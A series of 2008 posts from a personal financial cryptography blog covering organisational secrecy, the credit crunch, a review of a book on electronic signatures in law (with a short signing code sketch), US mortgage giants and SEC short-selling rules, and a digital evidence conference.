    • Pick a small area and start re-organising it. Choose an area where there is lots of frustration and lots of people to help. Open it up by doing something like a wiki, and work the information. It will take a lot of work and pushing by yourself, mostly because people won't know what you are doing or why (even if you tell them).
    • What is needed is a success. That is, a previously secret area is opened up, and as a result, good work gets done that was otherwise inhibited. People need to see the end-to-end journey in order to appreciate the message. (And, obviously, it should be clear at the end of it that you don't need the secrecy as much as you thought.)
    • Whenever some story comes out about a successful opening of secrecy, spread it around. The story probably isn't relevant to your organisation, but it gets people thinking about the concept. E.g., that which I posted recently was done to get people thinking. Another from Chandler.
    • Whenever there is a success on openness inside your organisation, help to make this a showcase (here are three). Take the story and spread it around; explain how the openness made it possible.
    • When some decision comes up about "and this must be kept secret," discuss it. Challenge it, make it prove itself. Remind people that we are an open organisation and there is benefit in treating all as open as possible.
    • Get a top-level decision that "we are open." Make it broad, make it serious, and incorporate the exceptions. "No, we really are open; all of our processes are open except when a specific exception is argued for, and that must be documented and open!" Once this is done, from top-level, you can remind people in any discussion. This might take years to get, so have a copy of a resolution in your back pocket for a moment when suddenly, the board is faced with it, and minded to pass a broad, sweeping decision.
    • Use phrases like "security-by-obscurity." Normally, I am not a fan of these as they are very often wrongly used; so-called security-by-obscurity often tans the behinds of supposed open standards models. But it is a useful catchphrase if it causes the listener to challenge the obscure security benefits of secrecy.
    • Create an opening protocol. Here's an idea I have seen: when someone comes across a secret document (generally after much discussion ...) that should not have been kept secret, let them engage in the Opening-Up Protocol without any further ado. Instead of grumbling or asking, put the ball in their court. Flip it around, and take the default as to be open:
      "I can't see why document X is secret, it seems wrong. Therefore, in 1 month, I intend to publish it. If there is any real reason, let me know before then."
      This protocol avoids the endless discussions as to why and whether.

    Well, that's what I have thought about so far. I am sure there is more.

    Posted by iang at 01:24 PM | Comments (0) | TrackBack

    September 21, 2008

    Why hasn't eBay tanked?

    I have a curious question: why hasn't eBay's share price plummeted? Also, to a lesser extent, those of amazon and google who also depend on a robust retail sales trade.

    My theory is this: when cash dries up, or in USA terms, credit, then people stop buying, and start to save. Last week, apparently, the credit spigot was not only tightened, it was turned off and padlocked! Rumours circulated of consumer credit disappearing before ones very eyes.

    So, surely this should affect the consumer markets, and especially those who are more likely to be in rarities rather than rice. Hence, eBay.

    Anecdotally, I've been watching a particular class of out-of-date, dead-tech items over the last 2 months. 2 months ago, they were going for around $200-300. Last week I saw offers hovering around $100, but, surprisingly, one went for $300, another for $250.

    This weekend, I'm watching two offers with zero bids, days into their auctions, and heading towards giveaway prices.

    This is great news for me, if I can pick them up for shipping costs. But what's the news for the US economy and the retailers? Hence the question: is eBay likely to weather a collapse in auctions and retail sales? Are amazon and google to follow?

    Posted by iang at 10:21 PM | Comments (7) | TrackBack

    August 25, 2008

    Should a security professional have a legal background?

    Graeme points to this entry that posits that security people need a legal background:

    My own experience and talking to colleagues has prompted me to wonder whether the day has arrived that security professionals will need a legal background. The information security management professional is under increasing pressure to cope with the demands of the organization for access to information, to manage the expectations of the data owner on how and where the information is going to be processed and to adhere to regulatory and legal requirements for the data protection and archiving. In 2008, a number of rogue trader and tax evasion cases in the financial sector have heightened this pressure to manage data.

    The short, sharp answer is no, but it is a little more nuanced than that. First, let's take the rogue trader issue, being someone who has breached the separation of roles within a trading company, and used it to bad effect. To spot and understand this requires two things: an understanding of how settlement works, and the principle of dual control. It does not require the law, at all. Indeed, the legal position of someone who has breached the separation, and has "followed instructions to make a lot of money" is a very difficult subject. Suffice to say, studying the law here will not help.

    Secondly, asking security people to study law so as to deal with tax evasion is equally fruitless but for different reasons: it is simply too hard to understand, it is less law than an everlasting pitched battle between the opposing camps.

    Another way of looking at this is to look at the FC7 thesis, which says that, in order to be an architect in financial cryptography, you need to be comfortable with cryptography, software engineering, rights, accounting, governance, value and finance. The point is not whether law is in there or not, but that there are an awful lot of important things that architects or security directors need before they need law.

    Still, an understanding of the law is no bad thing. I've found several circumstances where it has been very useful to me and people I know:

    • Contract law underpins the Ricardian contract.
    • Dispute resolution underpins the arbitration systems used in sensitive communities (such as WebMoney and CAcert).
    • The ICANN dispute system might have been designed by someone experienced enough to realise that touching domain registries can do grave harm. In the alternate, a jurist looking at the system will not come to that conclusion at all.

    In this case, the law knowledge helps a lot. Another area which is becoming more and more an issue is that of electronic evidence. As most evidence is now entering the digital domain (80% was a recent unreferenced claim) there is much to understand here, and much that one can do to save one's company. The problem with this, as lamented at the recent conference, is that any formal course of law includes nothing on electronic evidence. For that, you have to turn to books like those by Stephen Mason on Electronic Evidence. But that you can do yourself.

    Posted by iang at 03:38 PM | Comments (3) | TrackBack

    August 07, 2008

    Osama bin Laden gets a cosmetic makeover in his British Vanity Passport

    cwe points to this new way to improve your passport profile:

    Using his own software, a publicly available programming code, a £40 card reader and two £10 RFID chips, Mr van Beek took less than an hour to clone and manipulate two passport chips to a level at which they were ready to be planted inside fake or stolen paper passports.

    A baby boy’s passport chip was altered to contain an image of Osama bin Laden, and the passport of a 36-year-old woman was changed to feature a picture of Hiba Darghmeh, a Palestinian suicide bomber who killed three people in 2003. The unlikely identities were chosen so that there could be no suggestion that either Mr van Beek or The Times was faking viable travel documents.

    OK, so costs are what we track here at FC-central: we need 60 quid of parts, and let's call it 40 quid for the work. Add to that, a fake or stolen passport, which seems to run to around 100 depending. Call it 200, all-up, for the basic package. The fake may possibly be preferred because you can make it with the right photo inside the jacket, without having to do the professional dicey slicey work. Now that the border people are convinced that the RFID chip is perfectly secure, they won't be looking for that definitively British feel.

    Folks, if you are going to try this at home, use your own passport, because using fake passports is a bit naughty! There are all sorts of reasons to improve one's image, and cosmetics is a booming industry these days. Let's say we change the awful compulsory Taliban image to a studio photo by a professional photographer. Easy relaxed pose, nice smile, and with your favourite Italian holiday scenes in the background. Add some photoshop work to smooth out the excess lines, lighten up those hungover dark eyes, and shrink those tubby parts off. We'll be a hit with the senior citizens.

    We can also improve your hard details: For the 40-somethings, we'll take 10 years off your age, and for the teenager, we'll boost you up to 18 or 21. For the junior industry leader, we can add a title or two, and some grey at the side. Would you prefer Sir or Lord?

    Your premium vanity upgrade, with all the trimmings, is likely to set you back around 500, and less if you bring your own base. Think of the savings on gym fees, and all the burgers you can eat!

    One small wrinkle: there is a hint in the article that the British Government is offering these special personality units only until next year. Rush now...

    Posted by iang at 06:38 AM | Comments (8) | TrackBack

    August 06, 2008

    _Electronic Signatures in Law_, Stephen Mason, 2007

    Electronic signatures are now present in legal cases to the extent that while they remain novel, they are not without precedent. Just about every major legal code has formed a view in law on their use, and many industries have at least tried to incorporate them into vertical applications. It is then exceedingly necessary that there be an authoritative tome on the legal issues surrounding the topic.

    Electronic Signatures in Law is such a book, and I'm now the proud owner of a copy of the recent 2007 second edition, autographed no less by the author, Stephen Mason. Consider this a review, although I'm unaccustomed to such. Like the book, this review is long: intro, stats, a description of the sections, my view of the old digsig dream, and finally 4 challenges I threw at the book to measure its paces. (Shorter reviews here.)

    First the headlines: This is a book that is decidedly worth it if you are seriously in the narrow market indicated by the title. For those who are writing directives or legislation, architecting software of reliance, involved in the Certificate Authority business of some form, or likely to find themselves in a case or two, this could well be the essential book.

    At £130 or so, I'd have to say that the Financial Cryptographer who is not working directly in the area will possibly find the book too much for mild Sunday afternoon reading, but if you have it, it does not dive so deeply and so legally that it is impenetrable to those of us without an LLB up our sleeves. For us on the technical side, there is welcome news: although the book does not cover all of the failings and bugs that exist in the use of PKI-style digital signatures, it covers the major issues. Perhaps more importantly, those bugs identified are more or less correctly handled, and the criticism is well-grounded in legal thinking that itself rests on centuries of tradition.

    Raw stats: Published by Tottel publishing. ISBN 978-1-84592-425-6. At over 700 pages, it includes comprehensive indexes of statutory instruments, legislation and cases that run to 55 pages, by my count, and a further 10 pages on United Kingdom orders. As well, there are 54 pages on standards, correspondents, resources, glossary, followed by a 22 page index.

    Description. Mason starts out with serious treatments on issues such as "what is a signature?" and "what forms a good signature?" These two hefty chapters (119 pages) are beyond comprehensive but not beyond comprehension. Although I knew that the signature was a (mere) mark of intent, and it is the intent which is the key, I was not aware of how far this simple subject could go. Mason cites case law where "Mum" can prove a will, where one person signs for another, where a usage of any name is still a good signature, and, of course, where apparent signatures are rejected due to irregularities, and others accepted regardless of irregularities.

    Next, there is a fairly comprehensive (156 pages) review of country and region legal foundations, covering the major anglo countries, the European Union, and Germany in depth, with a chapter on International comparisons covering approaches, presumptions, liabilities and other complexities and a handful of other countries. Then, Mason covers electronic signatures comprehensively, turning to parties and risks, liability, non-contractual issues, and evidence (230 pages). Finally, he wraps up with a discussion of digital signatures (42 pages) and data protection (12 pages).

    Let me briefly summarise the financial cryptography view of the history of Digital Signatures: The concept of the digital signature had been around since the mid-1970s, firstly in the form of the writings by the public key infrastructure crowd, and secondly, popularised to a small geeky audience in the form of PGP in the early 1990s. However, deployment suffered as nobody could quite figure out the application.

    When the web hit in 1994, it created a wave that digital signatures were able to ride. To pour cold water on a grand fire-side story, RSA Laboratories managed to convince Netscape that (a) credit cards needed to be saved from the evil Mallory, (b) the RSA algorithm was critical to that need, and (c) certificates were the way to manage the keys required for RSA. Verisign was a business created by (friends of) RSA for that express purpose, and Netscape was happily impressed on the need to let other friends in. For a while everything was mom's apple pie and we'd all be rich: alongside VeriSign and friends, business plans claiming that all citizens would need certificates for signing purposes were floated around Wall Street, and this would set Americans back $100 a pop.

    Neither the fabulous b-plans nor the digital signing dream happened, but to the eternal surprise of the technologists, some legislatures put money down on the cryptographers' dream to render evidence and signing matters "simpler, please." The State of Utah led the way, but the politicians' dream is now more clearly seen in the European Directive on Electronic Signatures, and especially in the Germanic attitude that digital signatures are as strong by policy as they are weak in implementation terms. Today, digital signatures are relegated to either tight vertical applications (e.g., Ricardian contracts), cryptographic protocol work (TLS-style key exchanges), or being unworkable misfits lumbered with the cross of law and the shackles of PKI. These latter embarrassments only survive in those areas where (a) governments have rolled out smart cards for identity on a national basis, and/or (b) governments have used industrial policy to get some of that certificate love to their dependencies.

    In contrast to the above dream of digital signatures, attention really should be directed to the mere electronic signature, because they are much more in use than the cryptographic public key form, and arguably much more useful. Mason does that well, by showing how different forms are all acceptable (Chapter 10, or summarised here): Click-wrap, typing a name, PINs, email addresses, scanned manuscript signatures, and biometric forms are all contrasted against actual cases.

    The digital signature, and especially the legal projects of many nations, get criticised heavily. According to the cases cited, the European project of qualified certificates, with all its CAs, smart cards, infrastructure, liabilities, laws, and costs ad infinitum ... are just not needed. A PC, a word processor program and a scan of a hand signature should be fine for your ultimate document. Or, a typewritten name, or the words "signed!" Nowhere does this come out more clearly than in the chapter on Germany, where results deviate from the rest of the world.

    Due to the German Government's continuing love affair with the digital signature, and the backfired attempt by the EU to regularise the concept in the Electronic Signature Directives, digital and electronic signatures are guaranteed to provide for much confusion in the future. Germany especially mandated its courts to pursue the dream, with the result that most of the German case results deal with rejecting electronic submissions to courts if not attached with a qualified signature (6 of 8 cases listed in Chapter 7). The end result would be simple if Europeans could be trusted to use fax or paper, but consider this final case:

    (h) Decision of the BGH (Federal Supreme Court, 'Bundesgerichtshof') dated 10 October 2006,...: A scanned manuscript signature is not sufficient to be qualified as 'in writing' under §130 VI ZPO if such a signature is printed on a document which is then sent by facsimile transmission. Referring to a prior decision, the court pointed out that it would have been sufficient if the scanned signature was implemented into a computer fax, or if a document was manually signed before being sent by facsimile transmission to court.

    How deliciously Kafkaesque! And how much of a waste of time is being imposed on the poor, untrustworthy German lawyer. Mason's book takes on the task of documenting this confusion, and pointing some of the way forward. It is extraordinarily refreshing to find that the first two chapters, and over 100 pages, are devoted to simply describing signatures in law. It has been a frequent complaint that without an understanding of what a signature is, it is rather unlikely that any mathematical invention such as digsigs would come even close to mimicking it. And it didn't, as is seen in the 118-page romp through the act of signing:

    What has been lost in the rush to enact legislation is the fact that the function of the signature is generally determined by the nature and content of the document to which it is affixed.

    Which security people should have recognised as a red flag: we would generally not expect to use the same mechanism to protect things of wildly different values.

    Finally, I found myself pondering these teasers:

    Authenticate. I found myself wondering what the word "authenticate" really means, and from Mason's book, I was able to divine an answer: to make an act authentic. What then does "authentic" mean and what then is an "act"? Well, they are both defined as things in law: an "act" is something that has legal significance, and it is authentic if it is required by law and is done in the proper fashion. Which, I claim, is curiously different to whatever definition the technologists and security specialists use. OK, as a caveat, I am not the lawyer, so let's wait and see if I get the above right.

    Burden of Liability. The second challenge was whether the burden of liability in signing has really shifted. As we may recall, one of the selling points of digital signatures was that once properly formed, they would enable a relying party to hold the signing party to account, something which was sometimes loosely but unreliably referred to as non-repudiation.

    In legal terms, this would have shifted the burden of proof and liability from the recipient to the signer, and was thought by the technologists to be a useful thing for business. Hence, a selling point, especially to big companies and banks! Unfortunately the technologists didn't understand that burden and liability are topics of law, not technology, and for all sorts of reasons it was a bad idea. See that rant elsewhere. Still, undaunted, laws and contracts were written on the advice of technologists to shift the liability. As Mason puts it (M9.27 pp270):

    For obvious reasons, the liability of the recipient is shaped by the warp and weft of political and commercial obstructionism. Often, a recipient has no precise rights or obligations, but attempts are made using obscure methods to impose quasi-contractual duties that are virtually impossible to comply with. Neither governments nor commercial certification authorities wish to make explicit what they seek to achieve implicitly: that is, to cause the recipient to become a verifying party, with all the responsibilities that such a role implies....

    So how successful was the attempt to shift the liability / burden in law? Mason surveys this question in several ways: presumptions, duties, and liabilities directly. For a presumption that the sender was the named party in the signature, 6 countries said yes (Israel, Japan, Argentina, Dubai, Korea, Singapore) and one said no (Australia) (M9.18 pp265). Britain used statutory instruments to give a presumption to herself, the Crown only, that the citizen was the sender (M9.27 pp270). Others were silent, which I judge an effective absence of a presumption, and a majority for no presumption.

    Another important selling point was whether the CA took on any especial presumption of correctness: the best efforts seen here were that CAs were generally protected from any liability unless shown to have acted improperly, which somewhat undermines the entire concept of a trusted third party.

    How then are a signer and recipient to share the liability? Australia states quite clearly that the signing party is only considered to have signed, if she signed. That is, she can simply state that she did not sign, and the burden falls on the relying party to show she did. This is simply the restatement of the principle in the English common law; and in effect states that digital signatures may be used, but they are not any more effective than others. Then, the liability is exactly as before: it is up to the relying party to check beforehand, to the extent reasonable. Other countries say that reliance is reasonable, if the relying party checks. But this is practically a null statement, as not only is it already the case, it is the common-sense situation of caveat emptor deriving from Roman times.

    Although murky, I would conclude that the liability and burden for reliance on a signature is not shifted in the electronic domain, or at least governments seem to have held back from legislating any shift. In general, it remains firmly with the recipient of the signature. The best it gets in shiftyville is the British Government's bounty, which awards its citizens the special privilege of paying for their Government's blind blundering; same as it ever was. What most governments have done is a lot of hand-waving, while permitting CAs to utilise contract arrangements to put the parties in the position of doing the necessary due diligence. Again, same as it ever was, and decidedly no benefit or joy for the relying party is seen anywhere. This is no more than the normal private right to a contract or arrangement, and no new law nor regulation was needed for that.

    Digital Signing, finally, for real! The final challenge remains a work-in-progress: to construct some way to use digital signatures in a signing protocol. That is, use them to sign documents, or, in other words, what they were sold for in the first place. You might be forgiven for wondering if the hot summer sun has reached my head, but we have to recall that most of the useful software out there does not take OpenPGP, rather it takes PKI and x.509-style cryptographic keys and certificates. Some of these things offer to do things called signing, but there remains a challenge to make these features safe enough to be recommended to users. For example, my Thunderbird now puts a digital signature on my emails, but nobody, not it, not Mozilla, not CAcert, not anyone can tell me what my liability is.

    To address this need, I consulted the first two chapters, which lay out what a signature is, and by implication what signing is. Signing is the act of showing intent to give legal effect to a document; signatures are a token of that intention, recorded in the act of signing. In order, then, to use digital certificates in signing, we need to show a user's intent. Unfortunately, certificates cannot do that, as is repeatedly described in the book: mostly because they are applied by the software agent in a way mysterious and impenetrable to the user.

    Of course, the answer to my question is not clearly laid out, but the foundations are there: create a private contract and/or arrangement between the parties, indicate clearly the difference between a signed and unsigned document, and add the digital signature around the document for its cryptographic properties (primarily integrity protection and confirmation of source).

    The two chapters lay out the story for how to indicate intention in the English common law: it is simple enough to add the name, and the intention to sign, manually. No pen and ink is needed, nor more mathematics than that of ASCII, as long as the intention is clear. Hence, it suffices for me to write something like signed, iang at the bottom of my document. As the English common law will accept the addition of merely one's name as a signature, and the PKI school has hope that digital signatures can be used as legal signatures, it follows that both are required to be safe and clear in all circumstances. For the champions of either school, the other method seems like a reduction to futility, as neither seems adequate nor meaningful, but the combination may ease the transition for those who can't appreciate the other language.
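
    For concreteness, here is a minimal sketch of that combination (my own illustration, not a recipe from the book; the key handling, the contract wording and the liability questions are all waved away, and the Ed25519 choice is simply for brevity): the intent is carried by a plain line of text inside the document, and the digital signature is wrapped around the whole for its cryptographic properties only.

        # Sketch only: a human-readable statement of intent, plus a detached digsig
        # that protects integrity and confirms the source. Requires the Python
        # "cryptography" package; the key would normally be long-held, not generated here.
        from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

        document = (
            "I agree to pay Bob 100 units by Friday.\n"
            "signed, iang\n"                 # the legal signature: plain words of intent
        )

        key = Ed25519PrivateKey.generate()
        signature = key.sign(document.encode())   # digsig over the text, intent line included

        # The relying party checks integrity and source; the intent is read from the words.
        key.public_key().verify(signature, document.encode())
        print("integrity and source check out; the intent is in the words, not the maths")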

    Finally, I should close with a final thought: how does the book affect my notions as described in the Ricardian Contract, still one of the very few strong and clear designs in digital signing? I am happy to say that not much has changed, and if anything Mason's book confirms that the Ricardo designs were solid. Although, if I was upgrading the design, I would add the above logic. That is, as the digital signature remains impenetrable to the court, it behoves us to add the words seen below somewhere in the contract. Hence, no more than a field name-change, the tiniest tweak only, is indicated:

    Signed By: Ivan


    Posted by iang at 10:44 AM | Comments (0) | TrackBack

    August 05, 2008

    Monetary affairs on free reign, but the horse has Boulton'd

    The Fed roared into action mid July to rescue IndyMac, one of the USA's biggest banks. It's the normal story: toxic loans, payouts by the government, all accompanied by the USG moving to make matters worse. Chart of the week award goes to James Turk of Goldmoney:

    One of the basic functions of a central bank is to act as the 'lender of last resort'. This facility is used to keep banks liquid during a period of distress.

    For example, if a bank is experiencing a run on deposits, it will borrow from the central bank instead of trying to liquidate some of its assets to raise the cash it needs to meet its obligations. In other words, the central bank offers a 'helping hand' by providing liquidity to the bank in need.

    The following chart is from the Economic Research Department of the St. Louis Federal Reserve Bank. Here is the link: http://research.stlouisfed.org/fred2/series/BORROW. This long-term chart illustrates the amount of money banks have borrowed from the Federal Reserve from 1910 to the present.

    This chart proves there is truth to the adage that a picture is worth a thousand words. It's one thing to say that the present financial crisis is unprecedented, but it is something all together different to provide a picture putting real meaning to the word 'unprecedented'.

    It is an understatement to say that the U.S. banking system is in uncharted territory. The Federal Reserve is providing more than just a 'helping hand'.

    Also check the original so you can see the source!

    The problem with the "basic function" of the poetically-named 'lender of last resort' is that it is more a theory than a working practice. Such a thing has to be proven in action before we can rely on it. Unlike insurance, the lending of last resort function rarely gets proven, so it languishes until found to be broken in our very hour of need. Sadly, that is happening now in Switzerland. Over at the Economist they also surveyed the Fed's recent attempts to prove their credibility in the same game. FM & FM were bailed out, and gave the dollar holder a salutary lesson. The mortgage backers were supposed to be private:

    The belief in the implicit government guarantee allowed the pair to borrow cheaply. This made their model work. They could earn more on the mortgages they bought than they paid to raise money in the markets. Had Fannie and Freddie been hedge funds, this strategy would have been known as a “carry trade”.

    It also allowed Fannie and Freddie to operate with tiny amounts of capital. The two groups had core capital (as defined by their regulator) of $83.2 billion at the end of 2007 (see chart 2); this supported around $5.2 trillion of debt and guarantees, a gearing ratio of 65 to one. According to CreditSights, a research group, Fannie and Freddie were counterparties in $2.3 trillion-worth of derivative transactions, related to their hedging activities.

    There is no way a private bank would be allowed to have such a highly geared balance sheet, nor would it qualify for the highest AAA credit rating. In a speech to Congress in 2004, Alan Greenspan, then the chairman of the Fed, said: “Without the expectation of government support in a crisis, such leverage would not be possible without a significantly higher cost of debt.” The likelihood of “extraordinary support” from the government is cited by Standard & Poor’s (S&P), a rating agency, in explaining its rating of the firms’ debt.

    Now, we learn that FM & FM are government-sponsored enterprises, and the US is just another tottering socialist empire. OK, so the Central Bank, Treasury and Congress of the United States of America lied about the status of their subsidised housing economy. Now what? We probably would be wise to treat all other pronouncements with the skepticism due to a fundamentally flawed and now failing central monetary policy.

    The illusion investors fell for was the idea that American house prices would not fall across the country. This bolstered the twins’ creditworthiness. Although the two organisations have suffered from regional busts in the past, house prices have not fallen nationally on an annual basis since Fannie was founded in 1938.

    ... Of course, this strategy only raises another question. Why does America need government-sponsored bodies to back the type of mortgages that were most likely to be repaid? It looks as if their core business is a solution to a non-existent problem.

    Although there is an obvious benefit in paying for good times, there is an obvious downside: you have to pay it back one day, and you pay it back double big in the down times, likely with liberal doses of salt in your gaping wounds. Welcome, Angst!

    We keep coming back to the same old problem in the financial field as with, say, security, which is frequently written about in this blog. So many policies eventually founder on one flawed assumption: that we believe we know how to do it right.

    However, Fannie and Freddie did not stick to their knitting. In the late 1990s they moved heavily into another area: buying mortgage-backed securities issued by others (see chart 3). Again, this was a version of the carry trade: they used their cheap financing to buy higher-yielding assets.

    Why did they drift from the original mission?

    Because they could. Because they were paid on results. Because it was fun. Because they could be players, they could get some of that esteemed Wall Street respect.

    A thousand likely reasons, none of which are important, because the general truth here is that a subsidy will always turn around and hurt the very people who it intends to help. Washington DC's original intention of providing some nice polite subsidy would and must be warped to come around and bite them. Some day, some way.

    Sometimes the mortgage companies were buying each other’s debt: turtles propping each other up. Although this boosted short-term profits, it did not seem to be part of the duo’s original mission. As Mr Greenspan remarked, these purchases “do not appear needed to supply mortgage market liquidity or to enhance capital markets in the United States”.

    References to the comments of Mr Greenspan are generally to be taken as insider financial code for the real story. The same apparently goes for Mervyn King; yet, evidently, neither is a wizard who can repair the dam before it breaches, merely a farseer who can talk about the spreading cracks.

    Now, the USA housing market gets what it deserves for its hubris. The problems for the rest of us are twofold: it drags everything else in the world down as well, and it is not as if those in the Central Banks, the Congresses, the Administrations or the Peoples of the world will learn the slightest bit of wisdom over this affair. Plan on this happening again in another few decades.

    If you think I jest, you might like to invest in a new book by George Selgin entitled Good Money: Birmingham Button Makers, the Royal Mint, and the Beginnings of Modern Coinage, 1775-1821

    Although it has long been maintained that governments alone are fit to coin money, the story of coining during Great Britain’s Industrial Revolution disproves this conventional belief. In fact, far from proving itself capable of meeting the monetary needs of an industrializing economy, the Royal Mint presided over a cash shortage so severe that it threatened to stunt British economic growth. For several decades beginning in 1775, the Royal Mint did not strike a single copper coin. Nor did it coin much silver, thanks to official policies that undervalued that metal.

    To our great and enduring depression, the lesson of currency shortage was not learnt until well after the events of the 1930s. The story of Matthew Boulton is salutary:

    Late in 1797 Matthew Boulton finally managed to land his long-hoped-for regal coining contract, a story told in chapter five, “The Boulton Copper.” Once Boulton gained his contract, other private coiners withdrew from the business, fearing that the government was now likely to suppress their coins. Although the official copper coins Boulton produced were better than the old regal copper coinage had been, and were produced in large numbers, in many respects they proved less effective at addressing the coin shortage than commercial coins had been.

    Eventually Boulton took part in the reform of the Royal Mint, equipping a brand new mint building with his steam-powered coining equipment. By doing so, Boulton unwittingly contributed to his own mint’s demise, because contrary to his expectations the government reneged on its promise to let him go on supplying British copper coin.

    Then, policy was a charade and promises were not to be believed. Are we any better off now?

    Posted by iang at 06:37 AM | Comments (4) | TrackBack

    July 20, 2008

    SEC bans illegal activity then permits it...

    Whoops:

    SEC Spares Market Makers From `Naked-Short' Sales Ban

    July 18 (Bloomberg) -- The U.S. Securities and Exchange Commission exempted market makers in stocks from the emergency rule aimed at preventing manipulation in shares of Fannie Mae, Freddie Mac and 17 Wall Street firms.

    The SEC granted relief for equity and option traders responsible for pairing off orders from a rule that seeks to bar the use of abusive tactics when betting on a drop in share prices. Exchange officials said limits on ``naked-short'' sales would inhibit the flow of transactions and raise costs for investors.

    ``The purpose of this accommodation is to permit market makers to facilitate customer orders in a fast-moving market,'' the SEC said in the amendment.

    A reader writes: "that lasted what, 12 hours ?" I don't know, but it certainly clashes with the dramatic news of earlier in the week from the SEC, as the Economist reports:

    Desperate to prevent more collapses, the main stockmarket regulator has slapped a ban for up to one month on “naked shorting” of the shares of 17 investment banks, and of Fannie Mae and Freddie Mac, the two mortgage giants. Some argue that such trades, in which investors sell shares they do not yet possess, make it easier to manipulate prices. The SEC has also reportedly issued over 50 subpoenas to banks and hedge funds as part of its investigation into possibly abusive trading of shares of Bear Stearns and Lehman Brothers.

    Naked selling is technically illegal but unenforceable. The fact that it is illegal is a natural extension of contract laws: you can't sell something you haven't got; the reason it is technically easy is that the markets work on delayed settlement. That is, all orders to sell are technically short sales, as all sales are agreed before you turn up with the shares. Hence, all orders are based on trust, and if your broker trusts you then you can do it, and do it for as long as your broker trusts you.

    "Short selling" as manipulation, as opposed to all selling, works like this: imagine I'm a trusted big player. I get together with a bunch of mates, and agree, next Wednesday, we'll drive the market in Microsoft down. We conspire to each put in a random order for selling large lumps of shares in the morning, followed by lots of buy orders in the afternoon. As long as we buy in the afternoon what we sold in the morning, we're fine.

    On the morning of the nefarious deed, buyers at the top price are absorbed, then the next lower price, then the next ... and so the price trickles lower. Because we are big, our combined sell orders send signals through the market to say "sell, sell, sell" and others follow suit. Then, at the pre-arranged time, we start buying. By now however the price has moved down. So we sold at a high price and bought back at a lower price. We buy until we've collected the same number we sold in the morning, and hence our end-of-day settlement is zero. Profit is ours, crack open the gin!
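
    To put toy numbers on that round trip (a throwaway sketch: no fees, no real order book, just a fixed price step per lump sold, and every figure invented):

        # Morning-sell / afternoon-buy manipulation, reduced to arithmetic.
        lots = 5                    # five large lumps dumped in the morning
        lot_size = 100_000          # shares per lump
        start_price = 30.00
        step = 0.20                 # each lump pushes the price down a notch

        # Morning: sell into successively lower prices as the book absorbs each lump.
        sale_prices = [start_price - i * step for i in range(lots)]
        proceeds = sum(p * lot_size for p in sale_prices)

        # Afternoon: buy the same number of shares back at the depressed price.
        buyback_price = start_price - lots * step - 0.30   # others followed us down
        cost = buyback_price * lot_size * lots

        print(f"shares sold and re-bought: {lots * lot_size}")     # flat by settlement
        print(f"profit for the conspirators: {proceeds - cost:,.2f}")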

    This trick works because (a) we are big enough to buy/sell large lumps of shares, and (b) settlement is delayed as long as we can convince the brokers, so (c) we don't actually need the shares, just the broker's trust. Generally on a good day, no more than 1% of a company's shares move, so we need something of that size. I'd need to be very big to do that with the biggest fish, but obviously there are some sharks around:

    The S&P500 companies with the biggest rises in short positions relative to their free floats in recent weeks include Sears, a retailer, and General Motors, a carmaker.

    Those driven by morality and riven with angst will be quick to spot that (a) this is only available to *some* customers, (b) is therefore discriminatory, (c) that it is pure and simple manipulation, and (d) something must be done!

    Noting that the service of short-selling only works when the insiders let outsiders play that game, the simple-minded will propose that banning the insiders from letting it happen will do the trick nicely. But, this is easier said than done: selling without shares is how the system works, at its core, so letting the insiders do it is essential. From there, it is no distance at all to see that insiders providing short sales as a service to clients is ... not controllable, because fundamentally all activities are provided to a client some time, some way. Any rule will be bypassed *and* it will be bypassed for those clients who can pay more. In the end, any rule probably makes the situation worse than better, because it embeds the discrimination in favour of the big sharks, in contrast to one's regulatory aim of slapping them down.

    Rules making things worse could well be the stable situation in the USA, and possibly other countries. The root of the problem with the USA is historical: Congress makes the laws, and made most of the foundational laws for stock trading in the aftermath of the crash of 1929. Then, during the Great Depression, Congress didn't have much of a clue as to why the panic happened, and indeed nobody else knew much of what was going on either, but they thought that the SEC should be created to make sure it didn't happen again.

    Later on, many economists established their fame in studying the Great Depression (for example, Keynes and Friedman). However, whether any parliament in the world can absorb that wisdom remains questionable: Why should they? Lawmakers are generally lawyers, and are neither traders nor economists, so they rely on expert testimony. And, there is no shortage of experts to tell the select committees how to preserve the benefits of the markets for their people.

    Which puts the lie to a claim I made repeatedly over the last week: haven't we figured out how to do safe and secure financial markets by now? Some of us have, but the problem with making laws relying on that wisdom is that the lawmakers have to sort out those who profit by it from those who know how to make it safe. That's practically impossible when the self-interested trader can outspend the economist or the financial cryptographer 1000 to 1.

    And, exactly the same logic leads to the wide-spread observation that the regulators are eventually subverted to act on behalf of the largest and richest players:

    The SEC’s moves deserve scrutiny. Investment banks must have a dizzying influence over the regulator to win special protection from short-selling, particularly as they act as prime brokers for almost all short-sellers...

    The SEC’s initiatives are asymmetric. It has not investigated whether bullish investors and executives talked bank share prices up in the good times. Application is also inconsistent. ... Like the Treasury and the Federal Reserve, the SEC is improvising in order to try to protect banks. But when the dust settles, the incoherence of taking a wild swing may become clear for all to see.

    When the sheepdog is owned by the wolves, the shepherd will soon be out of business. Unlike the market for sheep, the shareholder cannot pick up his trusty rifle to equalise the odds. Instead, he is offered a bewildering array of new sheepdogs, each of which appear to surprise the wolves for a day or so with new fashionable colours, sizes and gaits. As long as the shareholder does not seek a seat at the table, does not assert primacy over the canines, and does not defend property rights over the rustlers from the next valley, he is no more than tomorrow's mutton, reared today.

    Posted by iang at 08:01 PM | Comments (2) | TrackBack

    July 06, 2008

    Digital Evidence: Musing on the rocky path to wisdom

    I've notched up two events in London: the International Conference on Digital Evidence 10 days ago, and yesterday I attended BarCampBankLondon. I have to say, they were great events!

    Another great conference in our space was the original FC in 1997 in Anguilla. This was a landmark in our field because it successfully brought together many disciplines who could each contribute their specialty. Law, software, cryptography, managerial, venture, economics, banking, etc. I had the distinct pleasure of a professor in law gently chiding me that I was unaware of an entire school of economics known as transaction economics that deeply affected my presentation. You just can't get that at the regular homogeneous conference, and while I notice that a couple of other conferences are laying claim to dual-discipline audiences, that's not the same thing as Caribbean polyglotism.

    Digital Evidence was as excellent as that first FC97, and could defend a top rating in conferences in the financial cryptography space. It had some of that interactivity, perhaps for two reasons: it successfully escaped the trap of fixation on local jurisdiction, and it had a fair smattering of technical people who could bring the practical perspective to the table.

    Although I'd like to blog more about the presentations, it is unlikely that I can travel that long journey; I've probably enough material for a month, and no month to do it in. Which highlights a continuing theme here on this blog: there is clearly a hole in the knowledge-to-wisdom market. It is now even an archaic cliche that we have too much data, too much information to deal with, so how do we make the step up through knowledge and on to wisdom?

